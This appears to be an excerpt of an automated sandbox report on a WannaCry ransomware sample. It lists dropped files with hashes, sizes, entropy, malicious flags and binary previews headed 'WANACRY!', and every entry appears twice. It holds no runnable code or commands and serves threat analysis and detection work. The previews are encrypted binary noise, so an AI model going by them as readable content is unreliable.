                                                                                      SSDEEP:48:bktyjlcH7pWWeB+GNYaFmZrihenQcFX2qlCK6l9G283QYe/zHrhqFfHa1IbVgu:otyjCeu4C2TKYG283QYeLYNFbVgu
                                                                                      MD5:8F47052ABEF8E2B9377DC3402E091FA8
                                                                                      SHA1:B0BABDE852B02E5460F9F15F908084B9BE3AD041
                                                                                      SHA-256:48BAD8B862BAFB2B97DF16824A3ACC5E8DA84137C232444831E723F3A8D6759D
                                                                                      SHA-512:0B9072F009C42CB31ED88819617795B542A94100DED1DB505E87D7BA92978088A1F59F1033A52BC4E011559EC29D6390C8690A0BCFAFA3DEC9E9154E379EF1AD
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....B..)...=a.@..../u..<\.."q...DJ.z..P...3.q....).r..7,..p...O,....T2..5..R.9.8,....1...l..3.z\f"W.cQ-.TK@.Y.%.v.Z.....~_....9.u.I.dz.\MD>.50.}R..W3.(...Q..s........[N..9....9o-...,..M5.....&.L..|k..[2!.....'..4.#......=c.JK70).3.s5.!Mos..7<.L..4R....A........6.y..........k..@.7'...5=.D",."..G.-..D.A.W....k..(.@,..dBM.YH...t.#.pz.._....bt+.....SgG......9..I.....v....X...'k...E..!.b.7~qQ.....5....-.H..I3(.#O...y......W......e...-...D[.kM.....X..@9..N>...+..SVH..'.......I...._.#k.,...[..>T.\h..t.......ga.)d.K.+A)..683.MP.h.l...@7...mx...J....hk0.&=..*....M.3'.F.".=f..u.....pl.$A.....Q5..l.#...{dM.n_....).......I@{\Ze..L66.|j.n.2A1.......`}.y....d|..b. nTS..U...h.c.4NL..G@...$..K....%...&!.....jl.&...5X/.#..4.8.J....K:........}.H...dU/....S..\.)..o.......>.4{Xe...Z[%l.<....].,U&......_.#{../.Z.f/."...~....".K=.O...d...}...z@Avb....j..E..5..H|.....>8>..O.=h.hE.4B..1...a.+..@......?5...;P.I.....2...\..e...Z..`~.........;..4-....3Q....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):3176
                                                                                      Entropy (8bit):7.941904673639651
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bktyjlcH7pWWeB+GNYaFmZrihenQcFX2qlCK6l9G283QYe/zHrhqFfHa1IbVgu:otyjCeu4C2TKYG283QYeLYNFbVgu
                                                                                      MD5:8F47052ABEF8E2B9377DC3402E091FA8
                                                                                      SHA1:B0BABDE852B02E5460F9F15F908084B9BE3AD041
                                                                                      SHA-256:48BAD8B862BAFB2B97DF16824A3ACC5E8DA84137C232444831E723F3A8D6759D
                                                                                      SHA-512:0B9072F009C42CB31ED88819617795B542A94100DED1DB505E87D7BA92978088A1F59F1033A52BC4E011559EC29D6390C8690A0BCFAFA3DEC9E9154E379EF1AD
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....B..)...=a.@..../u..<\.."q...DJ.z..P...3.q....).r..7,..p...O,....T2..5..R.9.8,....1...l..3.z\f"W.cQ-.TK@.Y.%.v.Z.....~_....9.u.I.dz.\MD>.50.}R..W3.(...Q..s........[N..9....9o-...,..M5.....&.L..|k..[2!.....'..4.#......=c.JK70).3.s5.!Mos..7<.L..4R....A........6.y..........k..@.7'...5=.D",."..G.-..D.A.W....k..(.@,..dBM.YH...t.#.pz.._....bt+.....SgG......9..I.....v....X...'k...E..!.b.7~qQ.....5....-.H..I3(.#O...y......W......e...-...D[.kM.....X..@9..N>...+..SVH..'.......I...._.#k.,...[..>T.\h..t.......ga.)d.K.+A)..683.MP.h.l...@7...mx...J....hk0.&=..*....M.3'.F.".=f..u.....pl.$A.....Q5..l.#...{dM.n_....).......I@{\Ze..L66.|j.n.2A1.......`}.y....d|..b. nTS..U...h.c.4NL..G@...$..K....%...&!.....jl.&...5X/.#..4.8.J....K:........}.H...dU/....S..\.)..o.......>.4{Xe...Z[%l.<....].,U&......_.#{../.Z.f/."...~....".K=.O...d...}...z@Avb....j..E..5..H|.....>8>..O.=h.hE.4B..1...a.+..@......?5...;P.I.....2...\..e...Z..`~.........;..4-....3Q....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):12392
                                                                                      Entropy (8bit):7.985780039685823
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:n0qD16BrzPubWkPlF/mIDajWAdRq74aMMyf:nzIzPu7dmIDmW2Rq7JMMyf
                                                                                      MD5:530999B207FBB8D2D88D4E734C9387DF
                                                                                      SHA1:C01980964F2C4D1648360F2ED645C99E06430A7C
                                                                                      SHA-256:22BA97DF7B3E685D94634DB251387743643A7453E92C24530AC78AEF31D99A76
                                                                                      SHA-512:FEF42DA0BE6B0B4A0ECB11B7514BAB9175A5A233373F674A0F97F9CACFFE801EFD0FB5B15B2011BCCECDAF25D485C752F558F284D0CA34B533AC33DF5C13D74E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....O....-D._..`...._K4.\.....Vbs..W..S4t0.,..D...... ..M{Gh..N.Ww..h..........V.[....e@kT..S.......V,>/.J.....!z.'.:.....R..:b5W.N+.+.Oz<..r%...n.m..".i:.>..1p...D+...4}.Q...k3..N...P.e;.GhE.X.}.2Y...Z...e2....mp. O.4..1.~...#@.._._..:..Z...........O/......... ......'-.di.......C.{kn...C..kv..$8,...X.^U..:=....[.....;.?..].ugb...@.?.$.G..OQ.%z......Q[1...1....dv.$o.`.h...U.,=Q.N_.z-.ek....n.|_f..Uj.........3....6.4.#..d.ACT.7.n..*..Q....i...f/.8.7...?.DE..I*\Y.a..7....H.u)(..s......a...9S.(.s M.c./.]...O<.QC.r.K.0.].d.dE0...ir.._.]...NR..........}..l].P9=....<.?R....Y.f.Q.a.)..p+);..RY.;.%.+..OW"..Y..#B.9....A...Dv:.+..(.......V.>[.l...v9.2.TZ..50\......l.OE..........~..t.e...8>J..*y.L.OcZ..9..oe.....~.,...._t....U..b,V.K.kf.......?.8......)C......Q.s..B.>.m.f.;K.s].......|.0....}..v.R....4...}.y........e^.1.(".=.LId/.;...&:......Y...s..EN...0.:M.g..Id7..m.O..M....o...u...+....%.E!~../]BT.J..]trV..n...zu/..^=.a&N.i..a.5_..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):12392
                                                                                      Entropy (8bit):7.985780039685823
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:n0qD16BrzPubWkPlF/mIDajWAdRq74aMMyf:nzIzPu7dmIDmW2Rq7JMMyf
                                                                                      MD5:530999B207FBB8D2D88D4E734C9387DF
                                                                                      SHA1:C01980964F2C4D1648360F2ED645C99E06430A7C
                                                                                      SHA-256:22BA97DF7B3E685D94634DB251387743643A7453E92C24530AC78AEF31D99A76
                                                                                      SHA-512:FEF42DA0BE6B0B4A0ECB11B7514BAB9175A5A233373F674A0F97F9CACFFE801EFD0FB5B15B2011BCCECDAF25D485C752F558F284D0CA34B533AC33DF5C13D74E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....O....-D._..`...._K4.\.....Vbs..W..S4t0.,..D...... ..M{Gh..N.Ww..h..........V.[....e@kT..S.......V,>/.J.....!z.'.:.....R..:b5W.N+.+.Oz<..r%...n.m..".i:.>..1p...D+...4}.Q...k3..N...P.e;.GhE.X.}.2Y...Z...e2....mp. O.4..1.~...#@.._._..:..Z...........O/......... ......'-.di.......C.{kn...C..kv..$8,...X.^U..:=....[.....;.?..].ugb...@.?.$.G..OQ.%z......Q[1...1....dv.$o.`.h...U.,=Q.N_.z-.ek....n.|_f..Uj.........3....6.4.#..d.ACT.7.n..*..Q....i...f/.8.7...?.DE..I*\Y.a..7....H.u)(..s......a...9S.(.s M.c./.]...O<.QC.r.K.0.].d.dE0...ir.._.]...NR..........}..l].P9=....<.?R....Y.f.Q.a.)..p+);..RY.;.%.+..OW"..Y..#B.9....A...Dv:.+..(.......V.>[.l...v9.2.TZ..50\......l.OE..........~..t.e...8>J..*y.L.OcZ..9..oe.....~.,...._t....U..b,V.K.kf.......?.8......)C......Q.s..B.>.m.f.;K.s].......|.0....}..v.R....4...}.y........e^.1.(".=.LId/.;...&:......Y...s..EN...0.:M.g..Id7..m.O..M....o...u...+....%.E!~../]BT.J..]trV..n...zu/..^=.a&N.i..a.5_..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):296
                                                                                      Entropy (8bit):7.146339990734531
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEnB0wbBN4X9Vzw3eP+1xiJcxhUk8YewEgTpWbdOh6bCaLj8LN68L0n:bkEnSwbBQLcJ1x/41YSgUOsDjK68I
                                                                                      MD5:3368F4A2A386D40C8BDF49CB811C2E91
                                                                                      SHA1:67ED3F5C36299F05531D0462A0E356565A510E2D
                                                                                      SHA-256:84FD12B3A0738D9F4D7535399789C19CA3A87294CB62FED51524616D3E2AD336
                                                                                      SHA-512:8ED34B3845FA3D4D8768850939EEE8E4BEEBCA744DB932EB223C8962DDCAE157C3C4A2CD1090F2079DB0435019F0E75E75076D11DCE2C816C764BFF02C375F17
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....g.R.....v[.`..!G..dwu........m..Or..r.?..2W.<fPCS....qo....W.7.r..K..$......+..7.~R.8....%.....jK.]..t....$b#I....~r..v.^..].....Q...ZK.../ M.ZX8..<A.@#.L..#.G.g......h.....5FR..GF0~..^1...W.N1..)li.^.8P....wa._g....l`..f2Q..q..D.t%.5i..g3.B...".............?.OvI.G....HT..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):296
                                                                                      Entropy (8bit):7.146339990734531
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEnB0wbBN4X9Vzw3eP+1xiJcxhUk8YewEgTpWbdOh6bCaLj8LN68L0n:bkEnSwbBQLcJ1x/41YSgUOsDjK68I
                                                                                      MD5:3368F4A2A386D40C8BDF49CB811C2E91
                                                                                      SHA1:67ED3F5C36299F05531D0462A0E356565A510E2D
                                                                                      SHA-256:84FD12B3A0738D9F4D7535399789C19CA3A87294CB62FED51524616D3E2AD336
                                                                                      SHA-512:8ED34B3845FA3D4D8768850939EEE8E4BEEBCA744DB932EB223C8962DDCAE157C3C4A2CD1090F2079DB0435019F0E75E75076D11DCE2C816C764BFF02C375F17
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....g.R.....v[.`..!G..dwu........m..Or..r.?..2W.<fPCS....qo....W.7.r..K..$......+..7.~R.8....%.....jK.]..t....$b#I....~r..v.^..].....Q...ZK.../ M.ZX8..<A.@#.L..#.G.g......h.....5FR..GF0~..^1...W.N1..)li.^.8P....wa._g....l`..f2Q..q..D.t%.5i..g3.B...".............?.OvI.G....HT..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):15032
                                                                                      Entropy (8bit):7.988257313132986
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:HqgbDK+I1evzXVa8OnFr4aK5xL1urFsqJRCB+:HxbpI1UVaVu5xeF7JRv
                                                                                      MD5:6F1BDAA5F8BEA62FE175945529BF431F
                                                                                      SHA1:DD33B641DB42FBE85C8544817CC4844AA08960DA
                                                                                      SHA-256:8B76CF21370618F2D2978190845A0BA374A7FCA94BDE2F3E9DB0E884EA0C94CB
                                                                                      SHA-512:276AEA2D41645743647BCE9769E302495A22DBC7D5F0832A0CDCF4C7E4552F5276FED622A9BB5D6BDBF30DF92189B5ABEDC89F307A575AEA612E6C3E80888AD2
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!..... ..b...8.D.A.8w.Z-...~..rE.^...._b.(........;...y.kt...s.....O...~..".*r.y.....$..."..E..=...R..J..w.N..w..Q..l|R[..$.V$.[......7/p...I........@V..).x.....<.<.|..v...`.T..r[.._.n.["(..=+.OG..l.0....F.M.`..J).. ..J.+/.I.|.....l....3..6.......9.......r?..w.Y.<....*E?...gj....p...X.M!>.l.J^...)..[N...r....5....I$(.......%./..#.lA.o..;.#...F.dH.}=..HI+...#..l...4....c.O.ilu.].A..x.Oi....T0.H.|.......)h..9..2...e.{B.!..'.......O..1...."...J.%........+.X....C%..c.P...!"g....9....P.I...%U.....K./...*b'...e.pL..D!b...T3.../q.}.x%.M.D.......g.w<..[u.j...>.....E.\..1Xg....G....RK...2x....A......i7.j*.z2JFj../...K..5&DK........z.2..J.P_.\u<P..^5U.p....Y.... '.{.0..o....^.8..d. ..~S+.......... a.{...DM.u.y.w..r....). w.Q.SkH_.N..3c..>[iM..[R..u......l...y...MC.....X..MF.nT..[..5rWN...........9...........b...K...!nzh5.3...........HL.5..#D....v!.E/..{.D}.#At..M6..u_{...z.:KCq...&L...d.....9...c...xjnL.>1..>k..# 9.~=.}.H..=....=
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):15032
                                                                                      Entropy (8bit):7.988257313132986
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:HqgbDK+I1evzXVa8OnFr4aK5xL1urFsqJRCB+:HxbpI1UVaVu5xeF7JRv
                                                                                      MD5:6F1BDAA5F8BEA62FE175945529BF431F
                                                                                      SHA1:DD33B641DB42FBE85C8544817CC4844AA08960DA
                                                                                      SHA-256:8B76CF21370618F2D2978190845A0BA374A7FCA94BDE2F3E9DB0E884EA0C94CB
                                                                                      SHA-512:276AEA2D41645743647BCE9769E302495A22DBC7D5F0832A0CDCF4C7E4552F5276FED622A9BB5D6BDBF30DF92189B5ABEDC89F307A575AEA612E6C3E80888AD2
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!..... ..b...8.D.A.8w.Z-...~..rE.^...._b.(........;...y.kt...s.....O...~..".*r.y.....$..."..E..=...R..J..w.N..w..Q..l|R[..$.V$.[......7/p...I........@V..).x.....<.<.|..v...`.T..r[.._.n.["(..=+.OG..l.0....F.M.`..J).. ..J.+/.I.|.....l....3..6.......9.......r?..w.Y.<....*E?...gj....p...X.M!>.l.J^...)..[N...r....5....I$(.......%./..#.lA.o..;.#...F.dH.}=..HI+...#..l...4....c.O.ilu.].A..x.Oi....T0.H.|.......)h..9..2...e.{B.!..'.......O..1...."...J.%........+.X....C%..c.P...!"g....9....P.I...%U.....K./...*b'...e.pL..D!b...T3.../q.}.x%.M.D.......g.w<..[u.j...>.....E.\..1Xg....G....RK...2x....A......i7.j*.z2JFj../...K..5&DK........z.2..J.P_.\u<P..^5U.p....Y.... '.{.0..o....^.8..d. ..~S+.......... a.{...DM.u.y.w..r....). w.Q.SkH_.N..3c..>[iM..[R..u......l...y...MC.....X..MF.nT..[..5rWN...........9...........b...K...!nzh5.3...........HL.5..#D....v!.E/..{.D}.#At..M6..u_{...z.:KCq...&L...d.....9...c...xjnL.>1..>k..# 9.~=.}.H..=....=
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):131672
                                                                                      Entropy (8bit):7.998628620882716
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:0Utx0xZtdUi7mxkgxPhjpl1rqeBqooSB0vIEpF0FfeaDigW2j:0MS1m5xpjp2+TgcfhigW2j
                                                                                      MD5:9B2657B4E3DAA0A1E112F1CED44A9DC4
                                                                                      SHA1:00E323959A4FEC0C90E0278B895EBA6C60E8EA53
                                                                                      SHA-256:210E24A8A4BD96B9D6F00A42091F55BAE2851421D64C6C685EF5186CF97606BE
                                                                                      SHA-512:5864C623AD346CFBCEA6B2B2FFD1E4958529D2BFB7E0DFB49C08D829766FA97D63EF6B4A58E309D6954C0BB1151C086CF9FC0C0B0699DF36E3738662AED394EC
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....p..D_..&...s7V.....].....4....<8K..A~m..S|..s.E>.\..F..}...4..F..%.......u]Id..(......n9..{Fh.'.....Z...rgc.L/./'.>A....d.&.o...*..P...Z.~.....]zz...'m...E.......`]+.w.:evC.......z...9.A_&........X.b.q.6..3...L.....>K.(D..6\\.G.........Sr.....<.......f.(.........3>Y|.I..S.../.9..Y...(2........y...X...,...g.....).V.C5Z.....w6.>........z7.X.h.k....b.......}..+....=I...r...y..v.". ..Da...Q....{m.....S.7.JS..8......2...sV....P.A.:|...R..,..Y.Qcw......2Y.....ip.r.`..4.Ai.>v....f.D/....R..X.iB..<|...qy).G.D(.].[@1n:,.{.D.y..=..M'....P(I.....L.A9.g..^....BM....b8..(. .|..(......L..../.BO.X....*Iba......0'D.F.b]m8|2...g.m...6.lBf.r...<..w..Y}..2..K..FC.o....b..F.SR.>n.zv.........F..7.f.jOS.\ii..,"..B.D....O.p.S.....A.L:..0.....'...T...x...0..../...6......h..iS:.`...;.JR.2..C.X.n..."%..u.l[)...v/=.Gt?..gb.@Xf>?M....."2Dy.%%...F.I-...Y..v...P...ZF.....T....Ei...p........u.,J....v).../.V....<./3./....u.L.....$....4............v.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):131672
                                                                                      Entropy (8bit):7.998628620882716
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:0Utx0xZtdUi7mxkgxPhjpl1rqeBqooSB0vIEpF0FfeaDigW2j:0MS1m5xpjp2+TgcfhigW2j
                                                                                      MD5:9B2657B4E3DAA0A1E112F1CED44A9DC4
                                                                                      SHA1:00E323959A4FEC0C90E0278B895EBA6C60E8EA53
                                                                                      SHA-256:210E24A8A4BD96B9D6F00A42091F55BAE2851421D64C6C685EF5186CF97606BE
                                                                                      SHA-512:5864C623AD346CFBCEA6B2B2FFD1E4958529D2BFB7E0DFB49C08D829766FA97D63EF6B4A58E309D6954C0BB1151C086CF9FC0C0B0699DF36E3738662AED394EC
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....p..D_..&...s7V.....].....4....<8K..A~m..S|..s.E>.\..F..}...4..F..%.......u]Id..(......n9..{Fh.'.....Z...rgc.L/./'.>A....d.&.o...*..P...Z.~.....]zz...'m...E.......`]+.w.:evC.......z...9.A_&........X.b.q.6..3...L.....>K.(D..6\\.G.........Sr.....<.......f.(.........3>Y|.I..S.../.9..Y...(2........y...X...,...g.....).V.C5Z.....w6.>........z7.X.h.k....b.......}..+....=I...r...y..v.". ..Da...Q....{m.....S.7.JS..8......2...sV....P.A.:|...R..,..Y.Qcw......2Y.....ip.r.`..4.Ai.>v....f.D/....R..X.iB..<|...qy).G.D(.].[@1n:,.{.D.y..=..M'....P(I.....L.A9.g..^....BM....b8..(. .|..(......L..../.BO.X....*Iba......0'D.F.b]m8|2...g.m...6.lBf.r...<..w..Y}..2..K..FC.o....b..F.SR.>n.zv.........F..7.f.jOS.\ii..,"..B.D....O.p.S.....A.L:..0.....'...T...x...0..../...6......h..iS:.`...;.JR.2..C.X.n..."%..u.l[)...v/=.Gt?..gb.@Xf>?M....."2Dy.%%...F.I-...Y..v...P...ZF.....T....Ei...p........u.,J....v).../.V....<./3./....u.L.....$....4............v.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):9272
                                                                                      Entropy (8bit):7.980189469540935
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:VuaBDNPlfJNMKRWvrNlE/V7d1dzEqxuE0Mfoi38Sk:gG6eWpS1Cqxu3xi30
                                                                                      MD5:61482B26B869FEBA5AA98D63F1189EFE
                                                                                      SHA1:3E0736F0E876F5339DEA56782937B4CAC33CD3FE
                                                                                      SHA-256:384D97A5F5339F9BFDF9A017993B73D672BA2BCD23B49FA3F6A06AF8F2A8CC6A
                                                                                      SHA-512:A6E1DA5CBAE99836E86C5BCE53ED3D2A30E48FF30C8B83004F13FB38D07B675968C1B020C24AD7858D15EF8033109B54AA93DFB5DA69AB8A0E5E5AFFDE5EE0D5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....4.s..sMY./5..q.yu.....n.H.....o.b..n.\...;H..Gh...; ...:.b.N. c1..U...?^;..L,.YB.-r../.B......%.......{....b|.....2V..]L._..}..-g.v~...;.FD.F.~7y.B......p..#..G....w6xB...)......A-...U....*...]g.:g.I..+.....8..m..(.E.k .}...&."...N....e@...Oy{G4.q.....#......^w...\.zX.r.......1..;..l...N........N.j>~.q..nT.%..w.L.QH..Uo?..W.?..:.8.(>..K.xZ...E.Z.@...UlO....%B...soJ."V\...M..W........W...O...JlQ@{..:.L... W!...o.B.s...:..H.........Z.g.mt.Y#9.M.I..o.e.fg......+-b.5@R.........f.|.q.i.j~Y.E.M.o@..../J.".\K~.`S...]aG.........:r........7 6}..O..\..KI...K......R........&..J?..iB.4Q?../..d~..1D.....D..=Q.mM8Pm....xD9$....B.Kmo...L.T.....>Y[...y.:...*........3.....8c...gD'5.Y..L..u.....m.~..Sp..t.E... ...d(.D.q.y.K..w..{.#=..-.....p......+.k..Xd..!.xR.WJ0+..q=.e......JI2..m.K5...Z.....}.....#.J..e.=VE>.]p......^......m...5...X=t....g{..'<.C....H.+..6...g....=Q.4....}..<..u...r...8...?/.R#.E....T..8l..g.D.8Qzh..........v....P.bz.6!dq...i._
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):9272
                                                                                      Entropy (8bit):7.980189469540935
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:VuaBDNPlfJNMKRWvrNlE/V7d1dzEqxuE0Mfoi38Sk:gG6eWpS1Cqxu3xi30
                                                                                      MD5:61482B26B869FEBA5AA98D63F1189EFE
                                                                                      SHA1:3E0736F0E876F5339DEA56782937B4CAC33CD3FE
                                                                                      SHA-256:384D97A5F5339F9BFDF9A017993B73D672BA2BCD23B49FA3F6A06AF8F2A8CC6A
                                                                                      SHA-512:A6E1DA5CBAE99836E86C5BCE53ED3D2A30E48FF30C8B83004F13FB38D07B675968C1B020C24AD7858D15EF8033109B54AA93DFB5DA69AB8A0E5E5AFFDE5EE0D5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....4.s..sMY./5..q.yu.....n.H.....o.b..n.\...;H..Gh...; ...:.b.N. c1..U...?^;..L,.YB.-r../.B......%.......{....b|.....2V..]L._..}..-g.v~...;.FD.F.~7y.B......p..#..G....w6xB...)......A-...U....*...]g.:g.I..+.....8..m..(.E.k .}...&."...N....e@...Oy{G4.q.....#......^w...\.zX.r.......1..;..l...N........N.j>~.q..nT.%..w.L.QH..Uo?..W.?..:.8.(>..K.xZ...E.Z.@...UlO....%B...soJ."V\...M..W........W...O...JlQ@{..:.L... W!...o.B.s...:..H.........Z.g.mt.Y#9.M.I..o.e.fg......+-b.5@R.........f.|.q.i.j~Y.E.M.o@..../J.".\K~.`S...]aG.........:r........7 6}..O..\..KI...K......R........&..J?..iB.4Q?../..d~..1D.....D..=Q.mM8Pm....xD9$....B.Kmo...L.T.....>Y[...y.:...*........3.....8c...gD'5.Y..L..u.....m.~..Sp..t.E... ...d(.D.q.y.K..w..{.#=..-.....p......+.k..Xd..!.xR.WJ0+..q=.e......JI2..m.K5...Z.....}.....#.J..e.=VE>.]p......^......m...5...X=t....g{..'<.C....H.+..6...g....=Q.4....}..<..u...r...8...?/.R#.E....T..8l..g.D.8Qzh..........v....P.bz.6!dq...i._
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):17784
                                                                                      Entropy (8bit):7.9902256091578545
                                                                                      Encrypted:true
                                                                                      SSDEEP:384:BL+g9ZxJp8vs8xR+Glseuazc9pcSK+9S1D2NOJwJW3AOZyB+G6CRxjR2:BLmU8xRpzu/9pc69zg6W3ASo+G1c
                                                                                      MD5:04EE3DBBD2A09BF838472240BBB1BA20
                                                                                      SHA1:649239407614B03DFA19079795906672DADB1DE3
                                                                                      SHA-256:5507931F03FB6915A41282E896DC80B408581F661B448F4F8BBACE1CFE471751
                                                                                      SHA-512:61B1C9B90D749D2876037B20571010E3D767AF05AAD2954E677822A091AE422FB9BE9D69C3D539B1F3E58AE30C5EE1CA07C212DAB33D511EF27EC7FDC2DA0EEF
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....".hO..A.,C..rwL....Y;...s.. *.Pmf.....{g..CR.ZgWoc./.;......G.Y.5.V.gQ.p.f....C......P.#..|....<.?.O.8?6..c..mZ.!T...,..4s.y......4...:b..S........E;.b...]Y. >.,fz....d......d....R;......w..1R.~..>;......*MVV......)'.f...g..k|.9V3...=^4..z......ZD........a`...@IA.P<.c...4.Z1..OW.u....t......pX.....W.i.......=Q.o......nMX. 8....p...._B.\e4{...H...h...Z.@t..A.'.\.jl+.%......J........+u.w......'.T.h.qV.....e.?.F....B{\7.6E.......*=.C)......N.w....ef.$.k..q.].....6...t..;A{.+..~.....[~*yGK..b.C:,q.....Z.!.....G..d;)Z..GjA....-M...a(....1j.k...,...,.q..Q....W.4l....a.[../,k..?d...9.....Zm.9CS..H...r........ P.....g..=.2t$.9.'.t.4..m.>@o/T..x.:.....)..U..<.$MB."..j..&.....z.uS.JE...-n.....>>p.N$.....P....r..1u..*...%..!.8...Hv.....B.....Z.m?[j.R*..[...O.p7F...^VJ.h...Sz.v.....?...Iy......W|.j..R.Ui./.2.SF...r.C....Q.].C.9.3..H.W.^c2 ./.D.K>....fMh9z..8.($+'+.o...z...r....5.ub...WQ.I..8.oI.Jn.mC2\.R...p.H....H.....Q?....*_..?....]K
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):17784
                                                                                      Entropy (8bit):7.9902256091578545
                                                                                      Encrypted:true
                                                                                      SSDEEP:384:BL+g9ZxJp8vs8xR+Glseuazc9pcSK+9S1D2NOJwJW3AOZyB+G6CRxjR2:BLmU8xRpzu/9pc69zg6W3ASo+G1c
                                                                                      MD5:04EE3DBBD2A09BF838472240BBB1BA20
                                                                                      SHA1:649239407614B03DFA19079795906672DADB1DE3
                                                                                      SHA-256:5507931F03FB6915A41282E896DC80B408581F661B448F4F8BBACE1CFE471751
                                                                                      SHA-512:61B1C9B90D749D2876037B20571010E3D767AF05AAD2954E677822A091AE422FB9BE9D69C3D539B1F3E58AE30C5EE1CA07C212DAB33D511EF27EC7FDC2DA0EEF
                                                                                      Malicious:true
                                                                                      Reputation:low
